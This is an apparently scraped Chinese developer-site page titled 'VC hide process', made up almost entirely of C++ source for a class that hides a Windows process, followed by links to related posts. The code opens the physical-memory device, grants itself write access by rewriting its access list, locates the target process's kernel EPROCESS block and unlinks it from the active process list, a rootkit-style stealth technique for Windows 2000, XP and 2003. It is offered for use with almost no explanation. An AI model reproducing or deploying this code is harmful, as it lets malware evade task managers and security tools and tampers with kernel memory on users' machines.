vc 隐藏进程
来源:互联网 发布:德阳数控铣床编程培训 编辑:程序博客网 时间:2024/05/22 00:32
#ifndef HIDEPROCESS_H#define HIDEPROCESS_Hclass CHideProcess {public:// 接口:隐藏当前进程static BOOL HideCurrent();// 接口:隐藏当前进程static BOOL HideByID(DWORD dwID);// 析构virtual ~CHideProcess();protected:static BOOL InitNTDLL();static BOOL YHideProcess(DWORD dwID);static VOID CloseNTDLL();static VOID SetPhyscialMemorySectionCanBeWrited(HANDLE hSection);static HANDLE OpenPhysicalMemory();static PVOID LinearToPhys(PULONG BaseAddress, PVOID addr);static ULONG GetData(PVOID addr);static BOOL SetData(PVOID addr,ULONG data);static DWORD GetEprocessFromPid (ULONG PID);// long __stdcall exeception(struct _EXCEPTION_POINTERS *tmp);protected:static BOOL m_bInit;static CHideProcess m_NoAction;private:// 构造析构CHideProcess();};#endif// HideProcess.cpp: implementation of the CHideProcess class.//进程隐藏程序// 要隐藏时调用HideProcess即可//////////////////////////////////////////////////////////////////////#include "stdafx.h"#include <windows.h>#include <Accctrl.h>#include <Aclapi.h>#include "HideProcess.h"#define NT_SUCCESS(Status) ((NTSTATUS)(Status) >= 0)#define STATUS_INFO_LENGTH_MISMATCH ((NTSTATUS)0xC0000004L)#define STATUS_ACCESS_DENIED ((NTSTATUS)0xC0000022L)typedef LONG NTSTATUS;typedef struct _IO_STATUS_BLOCK { NTSTATUS Status; ULONG Information;} IO_STATUS_BLOCK, *PIO_STATUS_BLOCK;typedef struct _UNICODE_STRING { USHORT Length; USHORT MaximumLength; PWSTR Buffer;} UNICODE_STRING, *PUNICODE_STRING;#define OBJ_INHERIT 0x00000002L#define OBJ_PERMANENT 0x00000010L#define OBJ_EXCLUSIVE 0x00000020L#define OBJ_CASE_INSENSITIVE 0x00000040L#define OBJ_OPENIF 0x00000080L#define OBJ_OPENLINK 0x00000100L#define OBJ_KERNEL_HANDLE 0x00000200L#define OBJ_VALID_ATTRIBUTES 0x000003F2Ltypedef struct _OBJECT_ATTRIBUTES { ULONG Length; HANDLE RootDirectory; PUNICODE_STRING ObjectName; ULONG Attributes; PVOID SecurityDescriptor; PVOID SecurityQualityOfService;} OBJECT_ATTRIBUTES, *POBJECT_ATTRIBUTES; //// SYSTEM_INFORMATION_CLASS//typedef enum _SYSTEM_INFORMATION_CLASS{ SystemHandleInformation = 16} SYSTEM_INFORMATION_CLASS;//// SYSTEM_HANDLE_INFORMATION// Information Class 16//typedef struct _SYSTEM_HANDLE_INFORMATION{ ULONG ProcessId; UCHAR ObjectTypeNumber; UCHAR Flags; USHORT Handle; PVOID Object; ACCESS_MASK GrantedAccess;} SYSTEM_HANDLE_INFORMATION, *PSYSTEM_HANDLE_INFORMATION;typedef NTSTATUS (CALLBACK* ZWOPENSECTION)( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes );typedef VOID (CALLBACK* RTLINITUNICODESTRING)( IN OUT PUNICODE_STRING DestinationString, IN PCWSTR SourceString );typedef NTSTATUS ( __stdcall *ZWQUERYSYSTEMINFORMATION ) ( IN SYSTEM_INFORMATION_CLASS SystemInformationClass, IN OUT PVOID SystemInformation, IN ULONG SystemInformationLength, OUT PULONG ReturnLength OPTIONAL );RTLINITUNICODESTRING RtlInitUnicodeString = NULL;ZWOPENSECTION ZwOpenSection = NULL;ZWQUERYSYSTEMINFORMATION ZwQuerySystemInformation = NULL;HMODULE g_hNtDLL = NULL;PVOID g_pMapPhysicalMemory = NULL;HANDLE g_hMPM = NULL;OSVERSIONINFO g_osvi;//---------------------------------------------------------------------------BOOL CHideProcess::m_bInit = FALSE;CHideProcess CHideProcess::m_NoAction;//////////////////////////////////////////////////////////////////////// Construction/Destruction//////////////////////////////////////////////////////////////////////CHideProcess::CHideProcess(){ m_bInit = InitNTDLL();}CHideProcess::~CHideProcess(){ CloseNTDLL();}// load dll and get functions BOOL CHideProcess::InitNTDLL(){ // load dll if (NULL == g_hNtDLL) { g_hNtDLL = LoadLibrary(_T("ntdll.dll")); if (NULL == g_hNtDLL) { return FALSE; } } // get functions RtlInitUnicodeString = (RTLINITUNICODESTRING)GetProcAddress( g_hNtDLL, "RtlInitUnicodeString"); ZwOpenSection = (ZWOPENSECTION)GetProcAddress( g_hNtDLL, "ZwOpenSection"); ZwQuerySystemInformation = ( ZWQUERYSYSTEMINFORMATION )GetProcAddress( g_hNtDLL, "ZwQuerySystemInformation" ); if ((RtlInitUnicodeString == NULL) || (ZwOpenSection == NULL) || (ZwQuerySystemInformation == NULL)) { return FALSE; } m_bInit = TRUE; return TRUE;}//---------------------------------------------------------------------------VOID CHideProcess::CloseNTDLL(){ if (NULL != g_hNtDLL) { FreeLibrary(g_hNtDLL); g_hNtDLL = NULL; m_bInit = FALSE; }}//---------------------------------------------------------------------------VOID CHideProcess::SetPhyscialMemorySectionCanBeWrited(HANDLE hSection) { PACL pDacl = NULL; PSECURITY_DESCRIPTOR pSD = NULL; PACL pNewDacl = NULL; DWORD dwRes = GetSecurityInfo( hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, &pDacl, NULL, &pSD ); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } EXPLICIT_ACCESS ea; RtlZeroMemory(&ea, sizeof(EXPLICIT_ACCESS)); ea.grfAccessPermissions = SECTION_MAP_WRITE; ea.grfAccessMode = GRANT_ACCESS; ea.grfInheritance= NO_INHERITANCE; ea.Trustee.TrusteeForm = TRUSTEE_IS_NAME; ea.Trustee.TrusteeType = TRUSTEE_IS_USER; ea.Trustee.ptstrName = _T("CURRENT_USER"); dwRes = SetEntriesInAcl(1,&ea,pDacl,&pNewDacl); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } dwRes = SetSecurityInfo( hSection, SE_KERNEL_OBJECT, DACL_SECURITY_INFORMATION, NULL, NULL, pNewDacl, NULL ); if(ERROR_SUCCESS != dwRes) { if(pSD) LocalFree(pSD); if(pNewDacl) LocalFree(pNewDacl); } } //---------------------------------------------------------------------------HANDLE CHideProcess::OpenPhysicalMemory(){ NTSTATUS status; UNICODE_STRING physmemString; OBJECT_ATTRIBUTES attributes; ULONG PhyDirectory; g_osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO); GetVersionEx (&g_osvi); if (5 != g_osvi.dwMajorVersion) return NULL; switch(g_osvi.dwMinorVersion) { case 0: PhyDirectory = 0x30000; break; // 2k case 1: PhyDirectory = 0x39000; break; // xp case 2: PhyDirectory = 0x39000; break; // 2k03 default: AfxMessageBox(_T("init PhysicalMemory: Unknown version...")); TRACE(_T("init PhysicalMemory: Unknown version...\n")); return NULL; } RtlInitUnicodeString(&physmemString, L"\\Device\\PhysicalMemory"); attributes.Length = sizeof(OBJECT_ATTRIBUTES); attributes.RootDirectory = NULL; attributes.ObjectName = &physmemString; attributes.Attributes = 0; attributes.SecurityDescriptor = NULL; attributes.SecurityQualityOfService = NULL; status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); if(status == STATUS_ACCESS_DENIED) { status = ZwOpenSection(&g_hMPM, READ_CONTROL|WRITE_DAC, &attributes); SetPhyscialMemorySectionCanBeWrited(g_hMPM); CloseHandle(g_hMPM); status = ZwOpenSection(&g_hMPM, SECTION_MAP_READ|SECTION_MAP_WRITE, &attributes); } if(!NT_SUCCESS(status)) { AfxMessageBox(_T("Open section: \\Device\\PhysicalMemory failed...")); TRACE(_T("Open section: \\Device\\PhysicalMemory failed...\n")); return NULL; } TRACE(_T("OpenPhysicalMemory() OffSet: %p\n"), PhyDirectory); g_pMapPhysicalMemory = MapViewOfFile( // ZwMapViewOfSection g_hMPM, // handle FILE_MAP_READ|FILE_MAP_WRITE, 0, // offset high part PhyDirectory, // offset low part 0x1000 // size ); if( g_pMapPhysicalMemory == NULL ) { AfxMessageBox(_T("\\Device\\PhysicalMemory MapViewOfFile failed...")); TRACE(_T("\\Device\\PhysicalMemory MapViewOfFile failed...")); return NULL; } return g_hMPM;}//---------------------------------------------------------------------------PVOID CHideProcess::LinearToPhys(PULONG BaseAddress, PVOID addr){ ULONG VAddr = (ULONG)addr; ULONG PGDE = BaseAddress[VAddr>>22]; ULONG PTE; ULONG PAddr; if (0 == (PGDE & 1)) return 0; ULONG tmp = PGDE & 0x00000080; if (0 != tmp) { PAddr = (PGDE & 0xFFC00000) + (VAddr & 0x003FFFFF); } else { TRACE(_T("GetData() OffSet: %p\n"), PGDE & 0xfffff000); PGDE = (ULONG)MapViewOfFile(g_hMPM, 4, 0, PGDE & 0xfffff000, 0x1000); PTE = ((PULONG)PGDE)[(VAddr&0x003FF000)>>12]; if (0 == (PTE&1)) return 0; PAddr=(PTE&0xFFFFF000)+(VAddr&0x00000FFF); UnmapViewOfFile((PVOID)PGDE); } return (PVOID)PAddr;}//---------------------------------------------------------------------------ULONG CHideProcess::GetData(PVOID addr){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); TRACE(_T("GetData() g_pMapPhysicalMemory: %p, addr: %p, phys: %p\n"), g_pMapPhysicalMemory, addr, phys); TRACE(_T("GetData() OffSet: %p\n"), phys & 0xfffff000); PULONG tmp = (PULONG)MapViewOfFile( g_hMPM, FILE_MAP_READ|FILE_MAP_WRITE, 0, phys & 0xfffff000, // offset low part 0x1000 // size ); if (0 == tmp) return 0; ULONG ret = tmp[(phys & 0xFFF)>>2]; UnmapViewOfFile(tmp); return ret;}//---------------------------------------------------------------------------BOOL CHideProcess::SetData(PVOID addr,ULONG data){ ULONG phys = (ULONG)LinearToPhys((PULONG)g_pMapPhysicalMemory, (PVOID)addr); TRACE(_T("SetData() OffSet: %p\n"), phys & 0xfffff000); PULONG tmp = (PULONG)MapViewOfFile( g_hMPM, FILE_MAP_WRITE, 0, phys & 0xfffff000, 0x1000 ); if (0 == tmp) return FALSE; tmp[(phys & 0xFFF)>>2] = data; UnmapViewOfFile(tmp); return TRUE;}//---------------------------------------------------------------------------/*long __stdcall CHideProcess::exeception(struct _EXCEPTION_POINTERS *tmp){ ExitProcess(0); return 1 ;}//*///---------------------------------------------------------------------------DWORD CHideProcess::GetEprocessFromPid (ULONG PID){ NTSTATUS status; PVOID buf = NULL; ULONG size = 1; ULONG NumOfHandle = 0; ULONG i; PSYSTEM_HANDLE_INFORMATION h_info = NULL; DWORD dwCurrentID = GetCurrentProcessId(); // TRACE(_T("GetCurrentProcessId = %d\n"), dwCurrentID); // LocateNtdllEntry( ); //打开自身句柄,这样才能在 handle 列表中找到自己, PROCESS 对应 ObjectTypeNum 为5 HANDLE hProc = OpenProcess( // PROCESS_ALL_ACCESS, PROCESS_QUERY_INFORMATION, FALSE, PID // GetCurrentProcessId() // ); if (NULL == hProc) { TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError()); TRACE(_T("OpenProcess failed! GetLastError() = %d\n"), GetLastError()); return 0; } for ( size = 1024; ; size *= 2 ) { if ( NULL == ( buf = calloc( size, 1 ) ) ) { TRACE( _T("calloc( %u, 1 ) failed\n"), size ); TRACE(_T("calloc( %u, 1 ) failed\n"), size ); if ( buf != NULL ) { free( buf ); buf = NULL; } CloseHandle(hProc); return 0; } status = ZwQuerySystemInformation( SystemHandleInformation, buf, size, NULL ); if ( !NT_SUCCESS( status ) ) { if ( STATUS_INFO_LENGTH_MISMATCH == status ) { free( buf ); buf = NULL; continue; } else { TRACE( "ZwQuerySystemInformation() failed\n"); TRACE( "ZwQuerySystemInformation() failed\n"); if ( buf != NULL ) { free( buf ); buf = NULL; } CloseHandle(hProc); return 0; } } else { break; } } /* end of for */ //返回到缓冲区的首先是一个ULONG类型的数据,表示有多少数组 NumOfHandle = *((PULONG)buf); h_info = ( PSYSTEM_HANDLE_INFORMATION )((ULONG)buf + 4); for(i = 0; i < NumOfHandle; i++) { if(h_info->ProcessId == dwCurrentID)//&&( h_info.Handle==0x3d8 ) ) { // TRACE(_T("ProcessId: %d, Handle: %p, OBJECT: %p, ObjectTypeNumber: %d\n\r"), // PID, h_info.Handle, h_info.Object, h_info.ObjectTypeNumber); if (h_info->Handle == (DWORD)hProc) // (h_info.ObjectTypeNumber == 5) { // TRACE(_T("****ProcessId: %d, Handle:%p, OBJECT %p\n\r"), // PID, hProc, h_info.Object); DWORD dwRet = (DWORD)(h_info->Object); if (buf != NULL) { free( buf ); buf = NULL; } CloseHandle(hProc); return dwRet; } } } if ( buf != NULL ) { free( buf ); buf = NULL; } CloseHandle(hProc); return 0;}// 隐藏进程主函数BOOL CHideProcess::YHideProcess(DWORD dwID){ // if (!m_bInit) { AfxMessageBox(_T("load NTDLL failed...")); TRACE(_T("load NTDLL failed...\n")); return FALSE; } // 获得指向进程的 EPROCESS 数据块的指针 ULONG process = (ULONG)GetEprocessFromPid(dwID); if (process == 0) { // TRACE(_T("GetEprocessFromPid() failed...\n")); return FALSE; } TRACE(_T("GetEprocessFromPid() process = %p...\n"), process); // 这个是打开对应的系统内存,并且映射为一个核心对象 if (NULL == OpenPhysicalMemory()) { AfxMessageBox(_T("OpenPhysicalMemory() failed...")); TRACE(_T("OpenPhysicalMemory() failed...\n")); return FALSE; } // // 下面的两个 if 完成对 Windows 的系统版本判断(只判断了2K和XP), // 并且根据不同的系统确定 EPROCESS 块中两个指针 FLINK 和 BLINK 的偏移位置 ULONG fw, bw; if (0 == g_osvi.dwMinorVersion) { // in Win2000/Vista: fw = GetData(PVOID(process + 0xa0)); bw = GetData(PVOID(process + 0xa4)); } else if ((1 == g_osvi.dwMinorVersion) || (2 == g_osvi.dwMinorVersion)) { // in WinXP: in Win2003 fw = GetData(PVOID(process + 0x88)); bw = GetData(PVOID(process + 0x8c)); } // **** TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw); TRACE(_T("process = %p\tfw = %p\tbw = %p ****Correct\n"), process, fw, bw); // 下面的两个SetData完成对进程活动链的更改, // 也就是让进程活动链跳过当前进程的EPROCESS块 SetData(PVOID(fw + 4), bw); SetData(PVOID(bw), fw); // 完成了 UnmapViewOfFile(g_pMapPhysicalMemory); g_pMapPhysicalMemory = NULL; CloseHandle(g_hMPM); g_hMPM = NULL; return TRUE;}// 隐藏进程接口BOOL CHideProcess::HideCurrent(){ TRACE(_T("Hide Current Process ID = %d \n"), GetCurrentProcessId()); return YHideProcess(GetCurrentProcessId());}// 隐藏进程接口BOOL CHideProcess::HideByID(DWORD dwID){ TRACE(_T("Hide Process ID = %d \n"), dwID); return YHideProcess(dwID);} 1 0
- vc 隐藏进程
- 在Win2K系统中隐藏进程的VC代码
- 隐藏进程
- 隐藏进程
- 进程隐藏
- 隐藏进程
- 隐藏进程
- 隐藏进程
- 隐藏进程
- 隐藏进程
- 隐藏进程
- 进程隐藏
- 隐藏进程
- 进程隐藏
- VC无进程木马下载器源码(利用IE隐藏进程)
- VC无进程木马下载器源码(利用IE隐藏进程)
- VC 进程
- vc隐藏任务栏标签
- java实现有条件字符串全排列输出
- Cocoa 基本语法
- c:if标签
- 读书入脑的最好方法
- android之OnTouchListener只能监听到ACTION_DOWN-----onTouchListener的返回值问题
- vc 隐藏进程
- IIS 部署MVC相关设置
- 专家详解伪造邮件攻击方法和防范措施
- QT 中的 collect2: ld returned 1 exit status 错误
- maven profile
- 开放地址法与链表法的优缺点及其实现
- Keil 的Configuration Wizard的编写
- cp如何拷贝完整路径
- Java版的Eval
